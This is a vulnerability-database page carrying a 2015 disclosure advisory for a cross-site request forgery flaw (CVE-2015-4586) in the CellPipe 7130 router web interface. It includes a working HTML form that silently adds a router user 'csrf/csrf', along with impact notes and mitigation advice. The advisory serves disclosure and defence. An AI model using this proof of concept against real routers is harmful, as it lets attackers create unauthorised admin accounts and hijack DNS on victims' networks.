Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDionisia LeratakiPACKETSTORM:132324
HistoryJun 16, 2015 - 12:00 a.m.

CellPipe 7130 Cross Site Request Forgery

2015-06-1600:00:00
Dionisia Lerataki
packetstormsecurity.com
37

EPSS

0.002

Percentile

55.6%

JSON
`CellPipe Router CSRF vulnerability  
  
Device model : CellPipe 7130 RG 5Ae. M2013 HOL  
*Software Version:* : *1.0.0.20h.HOL*  
CWE: 352 - https://cwe.mitre.org/data/definitions/352.html  
CVE: CVE-2015-4586  
Date: 16/06/2015  
Discovered by: Dionisia Lerataki  
(https://gr.linkedin.com/pub/dionisia-lerataki/88/18/891)  
  
  
Vulnerability type: Multiple CSRF vulnerabilities in the router's web  
interface  
  
CSRF (Cross Site Request Forgery) is an attack which forces an end user to  
execute unwanted actions on a web application in which he/she is currently  
authenticated. It is currently included in the OWASP Top 10 project.  
  
Exploitation and Impact:  
  
The exploitation of the above vulnerabilities, in addition with a social  
engineering  
attack, may lead to :  
  
• Unwanted service exposure  
• DNS Hijacking  
• Disabling wireless security  
• User account creation  
  
I have tested the scenario with the user account creation and the proof of  
concept is the following:  
  
<html>  
<body>  
<form action="http://192.168.1.1/password.cmd  
<http://192.168.2.1/password.cmd>">  
<input type="hidden" name="action" value="add_user" />  
<input type="hidden" name="userAdd" value="csrf" />  
<input type="hidden" name="pwdAdd" value="csrf" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
If a router administrator executes the above code a user with credentials  
(csrf/csrf) will be added.  
In our PoC the administrator must press the Submit request but in a real  
attack scenario an attacker can implement an auto submit javascript code.  
  
In our case the router IP address is: 192.168.1.1. Of course it can be  
exploited with the router's public IP address.  
  
Suggested mitigation:  
  
In order to properly patch the CSRF vulnerability the following measures  
have to be  
taken:  
  
• Add a randomly generated token associated with the user's session in order  
to prevent a CSRF attack. Alternatively a check to the referer header can be  
introduced. Although referer headers can be easily spoofed, they can  
prevent a CSRF attack of this kind.  
`

Related

cve 1
prion 1
cvelist 1
nvd 1
cve
cve
CVE-2015-4586
2015-06-23 14:59:06
prion
prion
Cross site request forgery (csrf)
2015-06-23 14:59:00
cvelist
cvelist
CVE-2015-4586
2015-06-23 14:00:00
nvd
nvd
CVE-2015-4586
2015-06-23 14:59:06

EPSS

0.002

Percentile

55.6%

JSON
Related for PACKETSTORM:132324
cve1prion1cvelist1nvd1